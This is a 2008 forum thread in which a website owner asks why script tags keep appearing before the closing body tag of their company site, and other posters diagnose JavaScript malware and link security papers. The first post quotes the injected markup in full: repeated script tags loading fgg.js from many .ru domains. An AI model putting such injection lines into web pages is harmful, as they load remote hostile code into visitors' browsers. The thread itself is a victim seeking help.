User Name Password Register
DaniWeb IT Discussion Community
Home
Forums
Tutorials
Code Snippets
Blogs
Link Directory
All
What is DaniWeb IT Discussion Community?
You're currently browsing the JavaScript / DHTML / AJAX section within the Web Development category of DaniWeb, a massive community of 429,778 software developers, web developers, Internet marketers, and tech gurus who are all enthusiastic about making contacts, networking, and learning from each other. In fact, there are 3,895 IT professionals currently interacting right now! Registration is free, only takes a minute and lets you enjoy all of the interactive features of the site.
Join our community!
Please support our JavaScript / DHTML / AJAX advertiser: Lunarpages Web Hosting
Views: 1070 | Replies: 7
Reply
Join Date: Jul 2008
Posts: 11
Reputation: sTyleSHA is an unknown quantity at this point 
Rep Power: 1
Solved Threads: 0
sTyleSHA sTyleSHA is offline Offline
Newbie Poster

Is this Strange problem due to virus ?

  #1  
Jul 25th, 2008
Dear All,

I face a strange problem. All of sudden in our company website, the below script gets included automatically the end of the body tag. i.e, above </body> tag. Any idea of how to rectify this problem? Is this some kinda virus ? Do you know any sites that has the solution <script src=http://www.4cnw.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.keje.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.nudk.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.jvke.ru/fgg.js></script><script src=http://www.gb53.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script>
AddThis Social Bookmark Button
Reply With Quote  
Join Date: Jul 2008
Location: Sweet India
Posts: 868
Reputation: Shanti Chepuru is on a distinguished road 
Rep Power: 2
Solved Threads: 77
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Practically a Posting Shark

Re: Is this Strange problem due to virus ?

  #2  
Jul 26th, 2008
your thinking is right...
i think its all because of one virus called JavaScript malware.....
scan your all web pages with anti virus scanner and find what is the exact virus.....
find the source of it...
Last edited by Shanti Chepuru : Jul 26th, 2008 at 12:52 am. Reason: add
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote  
Join Date: Jul 2008
Location: Sweet India
Posts: 868
Reputation: Shanti Chepuru is on a distinguished road 
Rep Power: 2
Solved Threads: 77
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Practically a Posting Shark

Re: Is this Strange problem due to virus ?

  #3  
Jul 26th, 2008
See this url for solution :
http://www.blackhat.com/presentation...6-Grossman.pdf
http://www.experts-exchange.com/Viru..._23590128.html
Last edited by Shanti Chepuru : Jul 26th, 2008 at 1:20 am.
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote  
Join Date: Jul 2008
Posts: 11
Reputation: sTyleSHA is an unknown quantity at this point 
Rep Power: 1
Solved Threads: 0
sTyleSHA sTyleSHA is offline Offline
Newbie Poster

Re: Is this Strange problem due to virus ?

  #4  
Jul 26th, 2008
OOPS ..the experts exchange link needs a paid sign up... But the pdf link was useful...but too technical for me and made me a bit scary of the vulnerabilities....Any ways thankz so much
Reply With Quote  
Join Date: Jul 2008
Location: Sweet India
Posts: 868
Reputation: Shanti Chepuru is on a distinguished road 
Rep Power: 2
Solved Threads: 77
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Practically a Posting Shark

Re: Is this Strange problem due to virus ?

  #5  
Jul 26th, 2008
you also post this thread in viruses forum....
may you get good advices.....
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote  
Join Date: Jul 2008
Location: Sweet India
Posts: 868
Reputation: Shanti Chepuru is on a distinguished road 
Rep Power: 2
Solved Threads: 77
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Practically a Posting Shark

Re: Is this Strange problem due to virus ?

  #6  
Jul 26th, 2008
see this:
http://www.informatik.uni-hamburg.de...lware_lncs.pdf
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote  
Join Date: Jul 2008
Location: Sweet India
Posts: 868
Reputation: Shanti Chepuru is on a distinguished road 
Rep Power: 2
Solved Threads: 77
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Practically a Posting Shark

Re: Is this Strange problem due to virus ?

  #7  
Jul 26th, 2008
do this first as first aid:
• Do not use the firewall for authentication: All http services in the intranet should employ authentication mechanisms on their own.
• Change all default passwords on home appliances: Authentication is useless if the password is known.
• Disable javascript: Enable JavaScript only for trusted pages that really require JavaScript to function.
This does not provide protection for the case that one of this pages was victim of an XSS [2]
attack, but it reduces the attack surface significantly.
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote  
Join Date: Jul 2008
Location: Sweet India
Posts: 868
Reputation: Shanti Chepuru is on a distinguished road 
Rep Power: 2
Solved Threads: 77
Shanti Chepuru's Avatar
Shanti Chepuru Shanti Chepuru is offline Offline
Practically a Posting Shark

Re: Is this Strange problem due to virus ?

  #8  
Jul 26th, 2008
check these:
References
[1] Jesse Burns. Cross site reference forgery - an introduction to a common web application weakness.
Whitepaper, https://www.isecpartners.com/documents/XSRF Paper.pdf, 2005.
[2] David Endler. The evolution of cross-site scripting attacks. Whitepaper, iDefense Inc., http://
www.cgisecurity.com/lib/XSS.pdf, May 2002.
[3] Jeremiah Grossman. Javascript malware, port scanning, and beyond. Posting to the websecurity
mailinglist, http://www.webappsec.org/lists/webse...chive/2006-07/
msg00097.html, July 2006.
[4] Jeremiah Grossman and TC Niedzialkowski. Hacking intranet websites from the outside. Talk
at Black Hat USA 2006, http://www.blackhat.com/presentations/bh-usa-06/
BH-US-06-Grossman.pdf, August 2006.
Be intelligent, But Don't try to cheat.. Be innocent But Don't get cheated..
Reply With Quote  
Reply

Only community members can participate in forum threads. You must register or log in to contribute.

Register
DaniWeb JavaScript / DHTML / AJAX Marketplace
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)

 

Thread Tools Display Modes
Linear Mode Linear Mode

antivirus apple arrest crime email exploit gmail google ipod kaspersky malware microsoft mobile news onecare phone police report satnav security symbian trends trojan virus windows worm
Similar Threads
Other Threads in the JavaScript / DHTML / AJAX Forum

Advertising Opportunities on DaniWeb
Contact Us - Newsletter Archive - Sitemap - Privacy Statement
All times are GMT -4. The time now is 4:01 pm.
Forum system based on vBulletin Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
©2003 - 2008 DaniWeb® LLC